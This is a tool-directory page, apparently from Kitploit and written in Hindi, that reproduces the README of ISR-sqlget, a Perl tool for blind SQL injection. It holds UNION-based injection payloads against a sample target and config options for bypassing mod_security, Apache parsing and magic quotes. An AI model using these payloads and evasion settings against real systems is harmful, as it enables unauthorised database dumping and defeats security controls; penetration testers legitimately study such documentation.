Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
isr-sqlget — ISR-sqlget It's a blind SQL injection tool developed in Perl. | Kitploit
उपकरण/GitHubGitHub/infobyte/isr-sqlget
Vulnerability AnalysisWeb Application ExploitationPenetration TestingDatabase Security
GitHubinfobyte/isr-sqlget

isr-sqlget

ISR-sqlget It's a blind SQL injection tool developed in Perl.

रिपॉजिटरी देखें
141413 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

-- ISR - Infobyte Security Research -- | ISR-sqlget | www.infobytesec.com |

..:: विवरण

ISR-sqlget: यह Perl में विकसित एक ब्लाइंड SQL इंजेक्शन उपकरण है। यह आपको डेटाबेस स्कीमा और तालिका पंक्तियाँ प्राप्त करने की अनुमति देता है। एक एकल GET/POST का उपयोग करके आप चुपचाप डेटाबेस संरचना तक पहुँच सकते हैं और एक एकल GET/POST का उपयोग करके आप प्रत्येक तालिका पंक्ति को CSV-जैसी फ़ाइल में डंप कर सकते हैं।

समर्थित डेटाबेस:

root@kitploit:~
- IBM DB2
- Microsoft SQL Server
- Oracle
- Postgres
- Mysql
- IBM Informix
- Sybase
- Hsqldb (www.hsqldb.org)
- Mimer (www.mimer.com)
- Pervasive (www.pervasive.com)
- Virtuoso (virtuoso.openlinksw.com)
- SQLite
- Interbase/Yaffil/Firebird (Borland)
- H2 (http://www.h2database.com)
- Mckoi (http://mckoi.com/database/)
- Ingres (http://www.ingres.com)
- MonetDB (http://www.monetdb.nl)
- MaxDB (www.mysql.com/products/maxdb/)
- ThinkSQL (http://www.thinksql.co.uk/)    
- SQLBase (http://www.unify.com)

चोरी सुविधाएँ:

root@kitploit:~
- Full-width/Half-width Unicode encoding
- Apache गैर-मानक CR बायपास
- mod_security बायपास
- अनियमित अपरकेस अनुरोध परिवर्तन
- PHP Magicquotes: DB CHR फ़ंक्शन या समान का उपयोग करके प्रत्येक स्ट्रिंग को एन्कोड करें।
- अनुरोधों को हेक्साडेसिमल मानों में बदलें
- /**/ या (\t) टैब के लिए गैर-स्पेस प्रतिस्थापन से बचें
- || या + संयोजन से बचें, DB concat फ़ंक्शन या समान का उपयोग करें।
- अनियमित उपयोगकर्ता-एजेंट
- अनियमित प्रॉक्सी-सर्वर
- अनियमित विलंब अनुरोध

सामान्य सुविधाएँ:

root@kitploit:~
- डेटाबेस स्कीमा डाउनलोड ब्लैकलिस्ट
- कुकी सरणी समर्थन
- SSL समर्थन
- प्रॉक्सी सर्वर समर्थन
- डेटाबेस जानकारी CSV प्रारूप में डंप की गई

रिपोर्टिंग:

root@kitploit:~
- प्रभाव कार्यकारी रिपोर्ट बनाने के लिए डेटाबेस संरचना ग्राफिकेशन के लिए Graphviz लाइब्रेरी की आवश्यकता है (http://www.graphviz.org/)

..:: उपयोग

उपकरण को निम्नलिखित जानकारी चाहिए:

  • : क्या कार्रवाई करनी है?
  • : कहाँ?

संभावित ACTIONs हैं:

root@kitploit:~
पहले:
1. डेटाबेस स्कीमा प्राप्त करें।

फिर:
2.a तालिका पंक्तियाँ प्राप्त करें (CSV प्रारूप)।
2.b ग्राफिक डेटाबेस स्कीमा प्राप्त करें।

..::उदाहरण:

लक्ष्य: http://target.infobytesec.com/helloworld.php?id=

helloworld.php स्रोत:

"; while ($tr = $database->fetch_row()) { print ""; print $tr['name']; print ""; } print ""; ?>

सत्र उदाहरण (कॉन्फ़िग फ़ाइल) पढ़ें: ./helloworld.pm

डेटाबेस स्कीमा प्राप्त करें:

; bash# ./ISR-sqlget.pl -s -n helloworld ; -------------------------------------------------- ; Action: Get dbschema, Session name: helloworld ; -------------------------------------------------- ; ; http://target.infobytesec.com/helloworld.php?id=,id=1 union select 1,COALESCE((select nspname from pg_namespace ; where a.relnamespace =pg_namespace.oid),'0'::text)||'[]'||COALESCE(relname,'0'::text)||'[]'||COALESCE(attname,'0'::text); ; ||'[__]'||COALESCE((select typname from pg_type where oid=b.atttypid),'0'::text) from (pg_attribute b JOIN pg_class a ON ; (a.oid = b.attrelid)) where (attnum > 0 and ((a.relkind = 'r'::"char") OR (a.relkind = 's'::"char"))) --' ; from sqlite_master where type='table' --,GET ; ; bash#

यह एक स्थानीय स्कीमा फ़ाइल उत्पन्न करता है: ./template/helloworld.dbschema

फिर तालिका पंक्तियाँ प्राप्त करें:

; bash# ./ISR-sqlget.pl -d -n helloworld ;-------------------------------------------------- ;Action: Get DBDATA, Session name: helloworld ;-------------------------------------------------- ;-------------------------------------------------- ;Action: Get DBDATA, Session name: helloworld, DbSchema: helloworld.dbschema ;-------------------------------------------------- ;------------------------------------------------------------------------------------------------------------------------------------------------------ ;http://target.infobyte.com.ar/helloworld.php?id=,id=1 union all select id||'[]'||name||'[]'||address from ;company.clients --,GET ;Save source table: ./datos/helloworld.company.clients.sql.html ;Save csv table: ./datos/helloworld.company.clients.csv ;------------------------------------------------------------------------------------------------------------------------------ ;.....

निर्देशिका "./datos/" में आपके पास प्रति तालिका दो फ़ाइलें होंगी:

[sessionname].[database].[table].sql.html # html स्रोत [sessionname].[database].[table].csv # अल्पविराम द्वारा पृथक मान

ध्यान दें कि "./datos" को सत्र कॉन्फ़िग फ़ाइल में $conf::outputdb पैरामीटर के साथ निर्दिष्ट किया जा सकता है।

..:: उन्नत

उपकरण SELECT SQL क्वेरी में केवल एक कॉलम प्रकार text/varchar/आदि का उपयोग करता है। UNION वाक्यों का उपयोग करके आप "[__]" को विभाजक के रूप में उपयोग करके उस कॉलम में सभी डेटाबेस स्कीमा प्राप्त कर सकते हैं।

जब आपने स्थानीय डेटाबेस स्कीमा पहले ही सहेज ली है, तो आप निम्न में सक्षम होंगे:

1.a तालिका पंक्तियाँ प्राप्त करें: उसी तकनीक का उपयोग करके आप डेटाबेस में प्रत्येक तालिका की सभी पंक्तियाँ प्राप्त कर सकते हैं, जो कॉलम डेटाटाइप text के साथ संगत नहीं हैं, उन्हें स्वयं के डेटाबेस फ़ंक्शन का उपयोग करके text डेटाटाइप में रूपांतरित किया जाता है।

1.b डेटाबेस स्कीमा ग्राफिक प्राप्त करें।

उपकरण प्रत्येक कार्रवाई के लिए एक सत्र कॉन्फ़िग फ़ाइल का उपयोग करता है। यह कॉन्फ़िग फ़ाइल SQL इंजेक्शन का उपयोग करने के लिए आवश्यक पैरामीटर परिभाषित करती है। पैरामीटर @conf::path उस विधि को निर्दिष्ट करता है जिससे कच्चे HTML को उपकरण के साथ काम करने के लिए पार्स किया जाता है।

सहायता विवरण:

Usage: ./ISR-sqlget.pl [ACTION] [OPTIONS]

Action: -c: पार्सर मॉड्यूल जांचें -t: परीक्षण पृष्ठ प्राप्त करें -a: सभी डेटाबेस नाम प्राप्त करें (केवल mssql) -s: डेटाबेस/संरचना प्राप्त करें -d: डेटाबेस/जानकारी प्राप्त करें (CSV प्रारूप) -g: डेटाबेस की ग्राफिक संरचना (GIF प्रारूप)

Options: -n: सत्र नाम -p: (-c क्रिया के साथ उपयोग करें, मॉड्यूल जांचने के लिए स्रोत पृष्ठ निर्दिष्ट करें); डिफ़ॉल्ट ./template/$SESSION.testpage -v: विस्तृत -h: सहायता

-t: सत्र फ़ाइल का उपयोग करके आपको एक छोटी डेटा सिस्टम तालिका मिलती है जो बाद में कच्चे HTML को पार्स करने के लिए "-c" क्रिया के साथ उपयोग की जाएगी।

-c: डिफ़ॉल्ट रूप से ./template/[session-name].testpage का उपयोग करता है। इसका उपयोग कच्चे HTML पार्सर को विकसित और परीक्षण करने के लिए किया जाता है। आप "-p" विकल्प का उपयोग करके कोई अन्य HTML फ़ाइल चुन सकते हैं।

-a: सभी DB इंजन तालिका पंक्तियाँ प्राप्त करने के लिए निम्नलिखित क्रम का उपयोग करते हैं: 1. "-s" संरचना प्राप्त करें (यह डेटाबेस स्कीमा को स्थानीय फ़ाइल में सहेजता है)। 2. "-d" तालिका डेटा प्राप्त करें।

root@kitploit:~
MSSQL सिस्टम तालिकाओं के कारण हमें एक पिछला चरण जोड़ना होगा:
1. "-a" सभी डेटाबेस नाम /schema/catalog प्राप्त करें (यह नामों को स्थानीय फ़ाइल में सहेजता है)।
2. "-s" संरचना प्राप्त करें (यह डेटाबेस स्कीमा को स्थानीय फ़ाइल में सहेजता है)।
3. "-d" तालिका डेटा प्राप्त करें।

-s: संरचना प्राप्त करें (यह डेटाबेस स्कीमा को स्थानीय फ़ाइल में सहेजता है)।
-d: तालिका डेटा प्राप्त करें।

-g: पहले प्राप्त स्थानीय डेटाबेस स्कीमा फ़ाइल का उपयोग करके डेटाबेस ग्राफिक स्कीमा (GIF प्रारूप) प्राप्त करें।

-n: यह सत्र कॉन्फ़िग फ़ाइल का नाम निर्दिष्ट करता है।

..:: नोट्स

./pmschanges.txt: हम LWP, Net::HTTP के संशोधित संस्करण का उपयोग करते हैं जिसमें विधियाँ और CRLs विनिर्देश शामिल हैं। यह फ़ाइल इन संशोधनों की व्याख्या करती है।

./dbs/isr_*: प्रत्येक डेटाबेस मॉड्यूल में @space चर होता है जो मान्य स्थान के प्रकार को निर्दिष्ट करता है। उदाहरण: my @space=(' ',"\t","/**/"); #सभी स्थान

..:: सत्र फ़ाइल विकल्प:

@conf::path #पैरामीटर @conf::path उस विधि को निर्दिष्ट करता है जिससे कच्चे HTML को उपकरण के साथ काम करने के लिए पार्स किया जाता है। #यह HTML::TreeBuilder के साथ एम्बेडेड Perl कोड का उपयोग करके कच्चे HTML को पार्स करता है। #पहला कॉन्फ़िगरेशन आवश्यक HTML टैग नामों वाला एक ट्री ऐरे है। अंतिम HTML टैग नाम Perl कोड के साथ संसाधित किया जाता है।

./examples/ में उदाहरण देखें example[n].html session[n].pm

$conf::site #वह साइट जहाँ कमजोर ऐप है

$conf::script #कमजोर स्क्रिप्ट फ़ाइल

$conf::method #विधि 'POST', 'GET', 'HELLO', '\r\n\r\n\r\n\r\n\r\n' (Apache विधि बायपास)

$conf::inj #UNION वाक्यों के साथ POST/GET पैरामीटर #यह चर का उपयोग करता है जो बाद में गतिशील जानकारी से बदल दिए जाएंगे।

root@kitploit:~
चर:
<VALUE> = सभी जानकारी प्राप्त करने के लिए उपयोग किया जाने वाला कॉलम।
<TABLE> = तालिका अनुभाग।
<WHERE> = जहाँ अनुभाग।
<TAIL>  = SQL वाक्य का अंतिम भाग।

उदाहरण: "id=1') union select <VALUE>,'a' from <TABLE> <WHERE> <TAIL> --";

$conf::where #यदि आपको यूनियन तालिका में कुछ अपवाद जोड़ने की आवश्यकता है, तो आपको इस #पैरामीटर का उपयोग करना होगा क्योंकि कुछ डेटाबेस संरचना क्वेरी में "WHERE" शामिल है

$conf::tail #SQL वाक्य का अंतिम भाग। $conf::param #पैरामीटर शैली = पोस्ट शैली 1, URL शैली 0 पोस्ट शैली= ;root@isr-slackware:~/dev# telnet localhost 80 ;Trying 127.0.0.1... ;Connected to localhost. ;Escape character is '^]'. ;GET http://site/aaa.php HTTP/1.0 ;id=aaa

root@kitploit:~
URL शैली:
;root@isr-slackware:~/dev# telnet localhost 80
;Trying 127.0.0.1...
;Connected to localhost.
;Escape character is '^]'.
;GET http://site/aaa.php?id=aaa HTTP/1.0

$conf::dbtype #डेटाबेस बैकएंड

root@kitploit:~
1 - Oracle
2 - Microsoft SQL Server
3 - Mysql    
4 - Postgres
5 - IBM DB2
6 - Interbase/Yaffil/Firebird (Borland)    
7 - Mimer (www.mimer.com)    
8 - Virtuoso (virtuoso.openlinksw.com)
9 - Pervasive (www.pervasive.com)    
10 - Hsqldb (www.hsqldb.org)    
11 - SQLite    
12 - IBM Informix
13 - Sybase
14 - H2 (http://www.h2database.com)
15 - Mckoi (http://mckoi.com/database/)
16 - Ingres (http://www.ingres.com)
17 - MonetDB (http://www.monetdb.nl)
18 - MaxDB (www.mysql.com/products/maxdb/)
19 - ThinkSQL (http://www.thinksql.co.uk/)    
20 - SQLBase (http://www.unify.com)

$conf::session #सत्र नाम (आपको .pm एक्सटेंशन के बिना सत्र कॉन्फ़िग फ़ाइल का वही नाम उपयोग करना होगा) $conf::outputdb #डंप की गई तालिका पंक्तियों का पथ

######### प्रॉक्सी $conf::proxy_host #प्रॉक्सी समर्थन उदाहरण: 'http://user:pass@host:port/'; $conf::rproxy #अनियमित प्रॉक्सी 1 सक्षम या 0 अक्षम $conf::rproxyfile #प्रॉक्सी अनियमित फ़ाइल ($conf::proxy_host के समान प्रारूप का उपयोग करें)

######### फ़िल्टर $conf::space #स्थान से बचें: 0 स्थान सक्षम या 1 स्थान ' ' को टैब '\t' से बदलें या #2 स्थान ' ' को टिप्पणी '/**/' से बदलें

$conf::apache_espace #आप HTTP/s अनुरोध में CRs मान निर्दिष्ट कर सकते हैं

#उदाहरण:

मान्य Apache CRs (\x0b, \x0c, \x0d,)

$conf::apache_espace="\x0b,\x0c"; #init=\x0b and end=\x0c

GET/POST/XXX HTTP अनुरोध को "GET\x0b/script.php\x0cHTTP/1.0" के रूप में संसाधित करें

$conf::apache_espace_rnd=1; #CRs 0x0b, 0x0c, 0x0d का यादृच्छिक संयोजन $conf::apache_espace_rmaxn=10; #यादृच्छिक वर्णों की अधिकतम संख्या #इस उदाहरण में, हम CRs (0x0b, 0x0c, 0x0d) को 1 से 10 तक यादृच्छिक करते हैं: #संदर्भ: http://www.osvdb.org/25837

$conf::mod_security #1 modsecurity <= 2.1.0 & (=>PHP 5.2.0||PERL||Python) बायपास सक्षम करें #संदर्भ: http://www.php-security.org/MOPB/BONUS-12-2007.html

$conf::full_width #1 फुल-विड्थ एन्कोडिंग बायपास सक्षम करें $conf::ruseragent #1 यादृच्छिक उपयोगकर्ता एजेंट का उपयोग सक्षम करें $conf::ruseragentfile #उपयोगकर्ता एजेंट फ़ाइल सूची $conf::uagent #डिफ़ॉल्ट उपयोगकर्ता एजेंट $conf::delay #कनेक्शन के बीच विलंब $conf::rdelay #1 कनेक्शन के बीच यादृच्छिक अधिकतम विलंब सक्षम करें, $conf:delay को अधिकतम मान के रूप में उपयोग करें। $conf::magicquotes #1 मैजिक कोट्स से बचने में सक्षम (प्रत्येक डेटाबेस में CHR फ़ंक्शन या समान का उपयोग करें) $conf::convertall_hex #1 प्रत्येक पैरामीटर मान को हेक्स प्रारूप (%41,%61) में बदलें $conf::rnd_uppercase #1 अपरकेस यादृच्छिक परिवर्तन सक्षम करें।

######## केवल mssql के लिए फ़िल्टर $conf::scape_plas #1 सक्षम करें, CONCAT फ़ंक्शन का उपयोग करें यदि स्क्रिप्ट '+' प्राप्त नहीं कर सकती #(स्ट्रिंग संयोजन के रूप में उपयोग किया जाता है) $conf::convertall_str #1 सभी कॉलम को स्ट्रिंग में बदलें (अनुशंसित) $conf::scape_output_less #1 सक्षम करें यदि स्क्रिप्ट '|' नहीं भेज सकती, तो बदलने के लिए डेटाबेस फ़ंक्शन का उपयोग करें

######## केवल oracle/db2/virtuoso/h2/mckoi/ingres/monetdb/maxdb/thinksql के लिए फ़िल्टर $conf::scape_pipe #CONCAT फ़ंक्शन या समान का उपयोग करें यदि स्क्रिप्ट '|' प्राप्त नहीं कर सकती (स्ट्रिंग संयोजन के रूप में उपयोग किया जाता है)

हैश पुनर्प्राप्ति से इनकार

$conf::deny_dbname #वह सरणी जिसमें संसाधित न किए जाने वाले डेटाबेस नाम हों (ब्लैकलिस्ट) उदाहरण मान = {'WMSYS' => 1, 'SYS' => 1 };

#कुकी $conf::cookie #1 कुकी सरणी सक्षम करें @conf::cookies #उपयोग करने के लिए कुकीज़ के साथ सरणी उदाहरण मान = ( { version=>undef, key=>'valu1', val=>'password', path=>'', domain=>'', port=>undef, path_spec=>undef, secure=>undef, maxage=>undef, discard=>undef, rest=>undef });

#ग्राफिक विकल्प (अधिक जानकारी के लिए GraphViz Perl मॉड्यूल सहायता देखें) $conf::graphdir = './graph/'; #ग्राफिक फ़ाइलों की गंतव्य निर्देशिका $conf::glayout = 'dot'; $conf::grootcolor='crimson'; $conf::gdbcolor='darkgreen'; $conf::gtablecolor='olivedrab1'; $conf::gcolumncolor='lightblue2'; $conf::gcolumn=0; #0= कॉलम न ग्राफ करें 1= कॉलम ग्राफ करें

..:: आवश्यकताएँ

1 - Perl मॉड्यूल: LWP::UserAgent HTTP::Cookies; Convert::EastAsianWidth Data::Dump GraphViz

2 - लाइब्रेरीज़ GraphViz प्रोजेक्ट (http://www.graphviz.org/)

..:: डाउनलोड

http://www.infobytesec.com/development.html

..:: लेखक Francisco Amato famato+at+infobytesec+dot+com

टूल डाउनलोड करें